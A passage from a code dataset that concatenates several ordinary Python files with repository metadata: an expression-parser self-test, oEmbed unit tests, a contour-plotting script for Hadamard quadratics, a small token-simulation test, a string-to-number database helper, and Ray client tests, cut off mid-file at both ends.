        '-0.99 LE (A-(B+C)) LE 0.99',
        '-1000.00 LE A LE 0.00',
        '-5000.00 LE A LE 0.00',
        'A < B',
        'A < 7000',
        'A = -(B)',
        'A = C',
        'A = 0',
        'A GT 0',
        'A GT 0.00',
        'A GT 7.00',
        'A LE B',
        'A LT -1000.00',
        'A LT -5000',
        'A LT 0',
        'A=(B+C+D)',
        'A=B',
        'I = (G + H)',
        '0.00 LE A LE 4.00',
        '4.00 LT A LE 7.00',
        '0.00 LE A LE 4.00 LE E > D',
        '2**2**(A+3)',
        ]
    vars_={'A': 0, 'B': 1.1, 'C': 2.2, 'D': 3.3, 'E': 4.4, 'F': 5.5,
           'G': 6.6, 'H': 7.7, 'I': 8.8, 'J': 9.9}
    # define tests from given rules: translate the FORTRAN-style operators
    # to Python syntax and use Python's eval() as the reference result.
    # Ordering matters: '=' must be rewritten before substitutions that
    # introduce '=' characters (e.g. 'GE' -> '>='), or those would be
    # corrupted into '>=='.  The original code applied 'LE' twice; the
    # redundant second pass was a no-op and has been removed.
    replacements = (
        ("=", "=="), ("EQ", "=="), ("LE", "<="), ("GT", ">"),
        ("LT", "<"), ("GE", ">="), ("NE", "!="), ("<>", "!="),
    )
    tests = []
    for t_orig in rules:
        t = t_orig
        for old, new in replacements:
            t = t.replace(old, new)
        tests.append((t_orig, eval(t, vars_)))
    # copy vars_ to EvalConstant lookup dict
    EvalConstant.vars_ = vars_
    failed = 0
    for test, expected in tests:
        ret = comp_expr.parseString(test)[0]
        parsedvalue = ret.eval()
        print(test, expected, parsedvalue, end=' ')
        if parsedvalue != expected:
            print("<<< FAIL")
            failed += 1
        else:
            print()
    print()
    if failed:
        print(failed, "tests FAILED")
    else:
        print("all tests PASSED")
# Run the self-test suite when executed as a script.
if __name__=='__main__':
    main()
| 31.157895
| 75
| 0.442286
|
4a04d91b06e56946d56460911ddd1e7c62a31fe4
| 4,181
|
py
|
Python
|
tests/test_oembed.py
|
kgaughan/adjunct
|
b4e845d3b9c0648e6ac46ee25e484e9660f3924e
|
[
"MIT"
] | null | null | null |
tests/test_oembed.py
|
kgaughan/adjunct
|
b4e845d3b9c0648e6ac46ee25e484e9660f3924e
|
[
"MIT"
] | 1
|
2019-02-23T14:41:35.000Z
|
2020-06-15T13:00:46.000Z
|
tests/test_oembed.py
|
kgaughan/adjunct
|
b4e845d3b9c0648e6ac46ee25e484e9660f3924e
|
[
"MIT"
] | null | null | null |
from http import client
import io
import json
import unittest
from unittest import mock
from adjunct.fixtureutils import FakeSocket, make_fake_http_response
from adjunct.oembed import (
_build_url,
fetch_oembed_document,
find_first_oembed_link,
parse_xml_oembed_response,
)
class BuildUrlTest(unittest.TestCase):
    """Tests for _build_url()'s maxwidth/maxheight query handling."""

    def test_base(self):
        # With no dimensions, the URL passes through untouched.
        self.assertEqual(_build_url("foo", None, None), "foo")

    def test_dimension(self):
        # Each supplied dimension is appended as a query parameter,
        # width before height.
        cases = [
            ((5, None), "foo&maxwidth=5"),
            ((None, 8), "foo&maxheight=8"),
            ((5, 8), "foo&maxwidth=5&maxheight=8"),
        ]
        for (width, height), expected in cases:
            self.assertEqual(_build_url("foo", width, height), expected)
class OEmbedFinderTest(unittest.TestCase):
    """Tests for find_first_oembed_link()."""
    # <link> entries with no oEmbed discovery link among them.
    links_without = [
        {"href": "https://www.example.com/style.css", "rel": "stylesheet"},
        {"href": "https://www.example.com/", "rel": "canonical"},
        {"href": "https://m.example.com/", "media": "handheld", "rel": "alternate"},
        {"href": "https://cdn.example.com/favicon.png", "rel": "icon"},
    ]
    def test_none(self):
        """No oEmbed links at all -> None."""
        self.assertIsNone(find_first_oembed_link(self.links_without))
    def test_find(self):
        """The first oEmbed link (here the JSON one) wins."""
        links = self.links_without + [
            {
                "href": "http://www.example.com/oembed?format=json",
                "rel": "alternate",
                "title": "JSON Example",
                "type": "application/json+oembed",
            },
            {
                "href": "http://www.example.com/oembed?format=xml",
                "rel": "alternate",
                "title": "XML Example",
                "type": "text/xml+oembed",
            },
        ]
        result = find_first_oembed_link(links)
        self.assertEqual(result, "http://www.example.com/oembed?format=json")
    def test_no_href(self):
        """An oEmbed link missing its href is skipped in favor of the next."""
        links = self.links_without + [
            {
                "rel": "alternate",
                "title": "JSON Example",
                "type": "application/json+oembed",
            },
            {
                "href": "http://www.example.com/oembed?format=xml",
                "rel": "alternate",
                "title": "XML Example",
                "type": "text/xml+oembed",
            },
        ]
        result = find_first_oembed_link(links)
        self.assertEqual(result, "http://www.example.com/oembed?format=xml")
class OEmbedXMLParserTest(unittest.TestCase):
    """Tests for parse_xml_oembed_response()."""
    def test_parse(self):
        # NOTE(review): the parser appears to drop the <url> element from
        # its result (it is absent from the expected dict) — confirm this
        # is intentional in parse_xml_oembed_response.
        fh = io.StringIO(
            """<?xml version="1.0" encoding="utf-8"?>
            <oembed>
            <version>1.0</version>
            <type>photo</type>
            <title>This is a title</title>
            <url>http://example.com/foo.png</url>
            <height>300</height>
            <width>300</width>
            </oembed>
            """
        )
        fields = parse_xml_oembed_response(fh)
        self.assertDictEqual(
            fields,
            {
                "version": "1.0",
                "type": "photo",
                "title": "This is a title",
                "width": "300",
                "height": "300",
            },
        )
def make_response(dct, content_type="application/json+oembed; charset=UTF-8"):
    """Build a fake HTTP response whose body is *dct* serialized as JSON."""
    body = json.dumps(dct)
    headers = {"Content-Type": content_type}
    return make_fake_http_response(body=body, headers=headers)
class FetchTest(unittest.TestCase):
    """Tests for fetch_oembed_document() with urlopen mocked out."""
    @mock.patch("urllib.request.urlopen")
    def test_fetch(self, mock_urlopen):
        """A well-typed oEmbed response round-trips to the original dict."""
        orig = {
            "version": "1.0",
            "type": "video",
            "html": "<video/>",
            "width": 480,
            "height": 270,
            "author_name": "John Doe",
            "title": "A video",
        }
        mock_urlopen.return_value = make_response(orig)
        fetched = fetch_oembed_document("https://example.com/oembed?type=json")
        mock_urlopen.assert_called_once()
        self.assertIsInstance(fetched, dict)
        self.assertDictEqual(fetched, orig)
    @mock.patch("urllib.request.urlopen")
    def test_fetch_bad(self, mock_urlopen):
        """A non-oEmbed Content-Type makes the fetch return None."""
        mock_urlopen.return_value = make_response({}, content_type="text/plain")
        fetched = fetch_oembed_document("https://example.com/oembed?type=json")
        mock_urlopen.assert_called_once()
        self.assertIsNone(fetched)
| 31.674242
| 84
| 0.566372
|
4a04da5f2d812a742b1816e73b2e299c829d08ff
| 2,884
|
py
|
Python
|
pystatreduce/doc/plot/plot_hadamard/plot_2DHadamard_contour.py
|
OptimalDesignLab/pyStatReduce
|
9ea128409b91dd582e574e2e1cc153572b6c60a4
|
[
"MIT"
] | null | null | null |
pystatreduce/doc/plot/plot_hadamard/plot_2DHadamard_contour.py
|
OptimalDesignLab/pyStatReduce
|
9ea128409b91dd582e574e2e1cc153572b6c60a4
|
[
"MIT"
] | null | null | null |
pystatreduce/doc/plot/plot_hadamard/plot_2DHadamard_contour.py
|
OptimalDesignLab/pyStatReduce
|
9ea128409b91dd582e574e2e1cc153572b6c60a4
|
[
"MIT"
] | null | null | null |
# Plot the contours of a 2D Hadamard Quadratic. This figure has 3 subplots,
# which describe the effect of different eigenvalue decay rates on the contours
# of the Hadamard quadratic
import os
import sys
import errno
sys.path.insert(0, '../../src')
import numpy as np
from mpl_toolkits import mplot3d
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import chaospy as cp
from stochastic_collocation import StochasticCollocation
from quantity_of_interest import QuantityOfInterest
from dimension_reduction import DimensionReduction
from stochastic_arnoldi.arnoldi_sample import ArnoldiSampling
import examples
# Problem setup: three 2-D Hadamard quadratics, one per eigenvalue decay
# rate (fast 1/i^2, linear 1/i, slow 1/sqrt(i)).
systemsize = 2
decay_rate_arr = np.array([2, 1, 0.5])
QoI1 = examples.HadamardQuadratic(systemsize, decay_rate_arr[0])
QoI2 = examples.HadamardQuadratic(systemsize, decay_rate_arr[1])
QoI3 = examples.HadamardQuadratic(systemsize, decay_rate_arr[2])
# Evaluate each QoI on an nx-by-nx grid over [-2, 2]^2; rows of J_* index
# x2 and columns index x1, matching matplotlib's contour() convention.
nx = 100
xlow = -2*np.ones(systemsize)
xupp = 2*np.ones(systemsize)
x1 = np.linspace(xlow[0], xupp[0], num=nx)
x2 = np.linspace(xlow[1], xupp[1], num=nx)
J_xi1 = np.zeros([nx, nx])
J_xi2 = np.zeros([nx, nx])
J_xi3 = np.zeros([nx, nx])
pert = np.zeros(systemsize)
# BUGFIX: the original used Python 2's xrange(), which does not exist in
# Python 3; range() is the drop-in equivalent here.
for i in range(nx):
    for j in range(nx):
        x = np.array([x1[i], x2[j]])
        J_xi1[j, i] = QoI1.eval_QoI(x, pert)
        J_xi2[j, i] = QoI2.eval_QoI(x, pert)
        J_xi3[j, i] = QoI3.eval_QoI(x, pert)
# Plot: one contour subplot per decay rate.  The original repeated the same
# five-call stanza three times; the loop below issues identical calls.
plt.rc('text', usetex=True)
matplotlib.rcParams['mathtext.fontset'] = 'cm'
props = dict(boxstyle='round', facecolor='white')
fname = "./pdfs/hadamard_contours.pdf"
f, axes = plt.subplots(1, 3, sharey=True, figsize=(10, 4))
plt.setp(axes, yticks=[-2, -1, 0, 1, 2])
subplots = [
    (J_xi1, r'$\lambda_i = \frac{1}{i^2}$'),
    (J_xi2, r'$\lambda_i = \frac{1}{i}$'),
    (J_xi3, r'$\lambda_i = \frac{1}{\sqrt{i}}$'),
]
for ax, (J, label) in zip(axes, subplots):
    ax.contour(x1, x2, J, cmap="coolwarm", linewidths=0.5)
    ax.set_xlabel(r'$\xi_1$', fontsize=16)
    ax.set_ylabel(r'$\xi_2$', fontsize=16)
    # Eigenvalue-decay annotation centered on the top edge of each axes.
    ax.text(0.5, 1, label, size=18, bbox=props,
            transform=ax.transAxes, horizontalalignment='center',
            verticalalignment='center')
# NOTE(review): assumes ./pdfs already exists; savefig fails otherwise.
f.savefig(fname, format='pdf')
| 36.506329
| 79
| 0.690707
|
4a04dad1a93a517dc1c0d49b0ef375f11430bc80
| 407
|
py
|
Python
|
tests/test_world.py
|
Will-Holden/cascadv2
|
fd43d47d4be075d30e75053f9af3cd82c33b6623
|
[
"Apache-2.0"
] | null | null | null |
tests/test_world.py
|
Will-Holden/cascadv2
|
fd43d47d4be075d30e75053f9af3cd82c33b6623
|
[
"Apache-2.0"
] | null | null | null |
tests/test_world.py
|
Will-Holden/cascadv2
|
fd43d47d4be075d30e75053f9af3cd82c33b6623
|
[
"Apache-2.0"
] | 1
|
2022-03-24T10:01:28.000Z
|
2022-03-24T10:01:28.000Z
|
import sys
import os
sys.path.append('..')
sys.path.append('.')
import unittest
from cascad.experiment.token_sender import ERC20TokenWorld
class TestAgent(unittest.TestCase):
    """Smoke test for the ERC20 token world simulation."""
    def test_token_world(self):
        # NOTE(review): constructor args look like (some ratio, 10, 10) —
        # confirm against ERC20TokenWorld's signature; not visible here.
        erc20_token_world = ERC20TokenWorld(0.5, 10, 10)
        print(erc20_token_world.next_id())
        # run() is only checked for not raising; no result is asserted.
        erc20_token_world.run()
if __name__ == '__main__':
    # unittest.main() discovers and runs the tests, then calls sys.exit();
    # the trailing `pass` that followed it was unreachable dead code and
    # has been removed.
    unittest.main()
| 22.611111
| 58
| 0.697789
|
4a04db344a155c70cb7857af7896426dc02f7f38
| 1,440
|
py
|
Python
|
db_format_helpers/strings_in_fields_to_numbers.py
|
ThorsteinnAdal/webcrawls_in_singapore_shippinglane
|
6f6073c58648407c495931678adb1d584e9105df
|
[
"Apache-2.0"
] | null | null | null |
db_format_helpers/strings_in_fields_to_numbers.py
|
ThorsteinnAdal/webcrawls_in_singapore_shippinglane
|
6f6073c58648407c495931678adb1d584e9105df
|
[
"Apache-2.0"
] | null | null | null |
db_format_helpers/strings_in_fields_to_numbers.py
|
ThorsteinnAdal/webcrawls_in_singapore_shippinglane
|
6f6073c58648407c495931678adb1d584e9105df
|
[
"Apache-2.0"
] | null | null | null |
__author__ = 'thorsteinn'
from is_number import is_number
from is_int import is_int
def strings_in_fields_to_numbers(db_key, db):
    """
    Convert numeric strings stored in db fields into actual numbers.

    u'123.22' becomes a float; u'123' becomes an int; thousands separators
    (u'1,234') are stripped first.  'Infinity' (any case) is left untouched.

    :param db_key: a single field name, a list of field names, or
        'all'/None to process every field of each ship record
    :param db: mapping of ship -> field dict; modified in place
    :raises KeyError: if db_key is an unrecognized (falsy non-None) key
    :return: None; the db passed in is mutated

    BUGFIX: the original branch structure raised KeyError for every
    ordinary string key (the 'all' check and its else-raise ran *after*
    ``fields = [db_key]`` had already been set) and called ``.lower()``
    before the ``db_key is None`` test, so None crashed with
    AttributeError.  The branches below implement the documented intent.
    """
    for ship in db.keys():
        ship_db = db[ship]
        # Resolve which fields to process for this ship record.
        if isinstance(db_key, list):
            fields = db_key
        elif db_key is None or db_key.lower() == 'all':
            fields = list(ship_db.keys())
        elif db_key:
            fields = [db_key]
        else:
            raise KeyError('{this_key} is not recognized as a valid key.'.format(this_key=db_key))
        for field in fields:
            # Only convert present, non-empty values that parse as numbers.
            if field in ship_db.keys() and ship_db[field] and is_number(ship_db[field]):
                val = str(ship_db[field])
                if val.upper() != 'INFINITY':
                    if ',' in val:
                        val = val.replace(',', '')
                    # A decimal point selects float; otherwise int.
                    if '.' in val:
                        ship_db[field] = float(val)
                    else:
                        ship_db[field] = int(val)
| 37.894737
| 119
| 0.555556
|
4a04db5c1a40b7c834d271b650c5a9f7e0dc8007
| 24,247
|
py
|
Python
|
python/ray/tests/test_client.py
|
jamesliu/ray
|
11ab412db1fa3603a3006e8ed414e80dd1f11c0c
|
[
"Apache-2.0"
] | 33
|
2020-05-27T14:25:24.000Z
|
2022-03-22T06:11:30.000Z
|
python/ray/tests/test_client.py
|
jamesliu/ray
|
11ab412db1fa3603a3006e8ed414e80dd1f11c0c
|
[
"Apache-2.0"
] | 227
|
2021-10-01T08:00:01.000Z
|
2021-12-28T16:47:26.000Z
|
python/ray/tests/test_client.py
|
gramhagen/ray
|
c18caa4db36d466718bdbcb2229aa0b2dc03da1f
|
[
"Apache-2.0"
] | 5
|
2020-08-06T15:53:07.000Z
|
2022-02-09T03:31:31.000Z
|
import os
import pytest
import time
import sys
import logging
import queue
import threading
import _thread
from unittest.mock import patch
import ray.util.client.server.server as ray_client_server
from ray.tests.client_test_utils import create_remote_signal_actor
from ray.tests.client_test_utils import run_wrapped_actor_creation
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import connect_to_client_or_not
from ray.util.client.ray_client_helpers import ray_start_client_server
from ray._private.client_mode_hook import client_mode_should_convert
from ray._private.client_mode_hook import disable_client_hook
from ray._private.client_mode_hook import enable_client_mode
from ray._private.test_utils import run_string_as_driver
@pytest.mark.parametrize("connect_to_client", [False, True])
def test_client_context_manager(ray_start_regular_shared, connect_to_client):
import ray
with connect_to_client_or_not(connect_to_client):
if connect_to_client:
# Client mode is on.
assert client_mode_should_convert(auto_init=True)
# We're connected to Ray client.
assert ray.util.client.ray.is_connected()
else:
assert not client_mode_should_convert(auto_init=True)
assert not ray.util.client.ray.is_connected()
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_client_thread_safe(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
return "ok"
class Blocker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.daemon = True
def run(self):
ray.get(block.remote())
b = Blocker()
b.start()
time.sleep(1)
# Can concurrently execute the get.
assert ray.get(fast.remote(), timeout=5) == "ok"
# @pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
# @pytest.mark.skip()
def test_client_mode_hook_thread_safe(ray_start_regular_shared):
with ray_start_client_server():
with enable_client_mode():
assert client_mode_should_convert(auto_init=True)
lock = threading.Lock()
lock.acquire()
q = queue.Queue()
def disable():
with disable_client_hook():
q.put(client_mode_should_convert(auto_init=True))
lock.acquire()
q.put(client_mode_should_convert(auto_init=True))
t = threading.Thread(target=disable)
t.start()
assert client_mode_should_convert(auto_init=True)
lock.release()
t.join()
assert q.get(
) is False, "Threaded disable_client_hook failed to disable"
assert q.get(
) is True, "Threaded disable_client_hook failed to re-enable"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_interrupt_ray_get(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
time.sleep(1)
return "ok"
class Interrupt(threading.Thread):
def run(self):
time.sleep(2)
_thread.interrupt_main()
it = Interrupt()
it.start()
with pytest.raises(KeyboardInterrupt):
ray.get(block.remote())
# Assert we can still get new items after the interrupt.
assert ray.get(fast.remote()) == "ok"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_get_list(ray_start_regular_shared):
    """ray.get() on a list of refs must batch into a single GetObject RPC."""
    with ray_start_client_server() as ray:
        @ray.remote
        def f():
            return "OK"
        # Degenerate cases: empty list and single-element list.
        assert ray.get([]) == []
        assert ray.get([f.remote()]) == ["OK"]
        get_count = 0
        get_stub = ray.worker.server.GetObject
        # ray.get() uses unary-unary RPC. Mock the server handler to count
        # the number of requests received.
        def get(req, metadata=None):
            nonlocal get_count
            get_count += 1
            return get_stub(req, metadata=metadata)
        ray.worker.server.GetObject = get
        refs = [f.remote() for _ in range(100)]
        assert ray.get(refs) == ["OK" for _ in range(100)]
        # Only 1 RPC should be sent.
        assert get_count == 1
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
# Make sure ray.put(1) == 1 is False and does not raise an exception.
objectref = ray.put(1)
assert not objectref == 1
# Make sure it returns True when necessary as well.
assert objectref == ClientObjectRef(objectref.id)
# Assert output is correct type.
list_put = ray.put([1, 2, 3])
assert isinstance(list_put, ClientObjectRef)
assert ray.get(list_put) == [1, 2, 3]
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_put_failure_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
class DeSerializationFailure:
def __getstate__(self):
return ""
def __setstate__(self, i):
raise ZeroDivisionError
dsf = DeSerializationFailure()
with pytest.raises(ZeroDivisionError):
ray.put(dsf)
# Ensure Ray Client is still connected
assert ray.get(ray.put(100)) == 100
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or \
(ready, remaining) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) \
or (ready_retval, remaining_retval) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef(b"blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
SignalActor = create_remote_signal_actor(ray)
signaler = SignalActor.remote()
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
# Timeout 0 on ray.wait leads to immediate return
# (not indefinite wait for first return as with timeout None):
unready_ref = signaler.wait.remote()
res = ray.wait([unready_ref], timeout=0)
# Not ready.
assert res[0] == [] and len(res[1]) == 1
ray.get(signaler.send.remote())
ready_ref = signaler.wait.remote()
# Ready.
res = ray.wait([ready_ref], timeout=10)
assert len(res[0]) == 1 and res[1] == []
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return "Hello " + whom, self.count
@ray.method(num_returns=2)
def say_hi(self, whom):
self.count += 1
return "Hi " + whom, self.count
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
ref = actor.say_hello.remote("world")
s, count = ray.get(ref)
assert s == "Hello world"
assert count == 2
r1, r2 = actor.say_hi.remote("ray")
assert ray.get(r1) == "Hi ray"
assert ray.get(r2) == 3
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact,
10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(actor_handle.exec_exec.remote(second_actor, fact,
9)) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj,
4)) == local_fact(4)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
# Allow some time to propogate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2, logs_with_id
assert any(
(msg.find("get") >= 0 for msg in logs_with_id)), logs_with_id
assert any(
(msg.find("put") >= 0 for msg in logs_with_id)), logs_with_id
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
num_hello = 0
for msg in log_msgs:
if "Hello world" in msg:
num_hello += 1
assert num_hello == 2, f"Invalid logs: {log_msgs}"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_serializing_exceptions(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(
ValueError, match="Failed to look up actor with name 'abc'"):
ray.get_actor("abc")
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_invalid_task(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote(runtime_env="invalid value")
def f():
return 1
# No exception on making the remote call.
ref = f.remote()
# Exception during scheduling will be raised on ray.get()
with pytest.raises(Exception):
ray.get(ref)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor.
"""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
@ray.method(num_returns=2)
def half(self):
return self.x / 2, self.x / 2
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(
name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detatched_actor = ray.get_actor("test_acc2")
for i in range(5):
detatched_actor.inc.remote()
assert ray.get(detatched_actor.get.remote()) == 6
h1, h2 = ray.get(detatched_actor.half.remote())
assert h1 == 3
assert h2 == 3
def test_error_serialization(ray_start_regular_shared):
"""Test that errors will be serialized properly."""
fake_path = os.path.join(os.path.dirname(__file__), "not_a_real_file")
with pytest.raises(FileNotFoundError):
with ray_start_client_server() as ray:
@ray.remote
def g():
with open(fake_path, "r") as f:
f.read()
# Raises a FileNotFoundError
ray.get(g.remote())
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") == b""
def test_startup_retry(ray_start_regular_shared):
    """Client connect() should keep retrying until a server appears."""
    from ray.util.client import ray as ray_client
    ray_client._inside_client_test = True
    # With retries capped at 1 and no server listening, connect must fail.
    with pytest.raises(ConnectionError):
        ray_client.connect("localhost:50051", connection_retries=1)
    def run_client():
        ray_client.connect("localhost:50051")
        ray_client.disconnect()
    # Start a client that retries in the background, bring the server up
    # late, and verify the connection eventually succeeds.
    thread = threading.Thread(target=run_client, daemon=True)
    thread.start()
    time.sleep(3)
    server = ray_client_server.serve("localhost:50051")
    thread.join()
    server.stop(0)
    ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
    """A server dropping mid-task should surface as ConnectionError on get."""
    from ray.util.client import ray as ray_client
    ray_client._inside_client_test = True
    @ray_client.remote
    def f(x):
        time.sleep(4)
        return x
    def stop_server(server):
        time.sleep(2)
        server.stop(0)
    server = ray_client_server.serve("localhost:50051")
    ray_client.connect("localhost:50051")
    # Kill the server while f() is still executing.
    thread = threading.Thread(target=stop_server, args=(server, ))
    thread.start()
    x = f.remote(2)
    with pytest.raises(ConnectionError):
        _ = ray_client.get(x)
    thread.join()
    ray_client.disconnect()
    ray_client._inside_client_test = False
    # Wait for f(x) to finish before ray.shutdown() in the fixture
    time.sleep(3)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
@patch.dict(os.environ, {"RAY_ENABLE_AUTO_CONNECT": "0"})
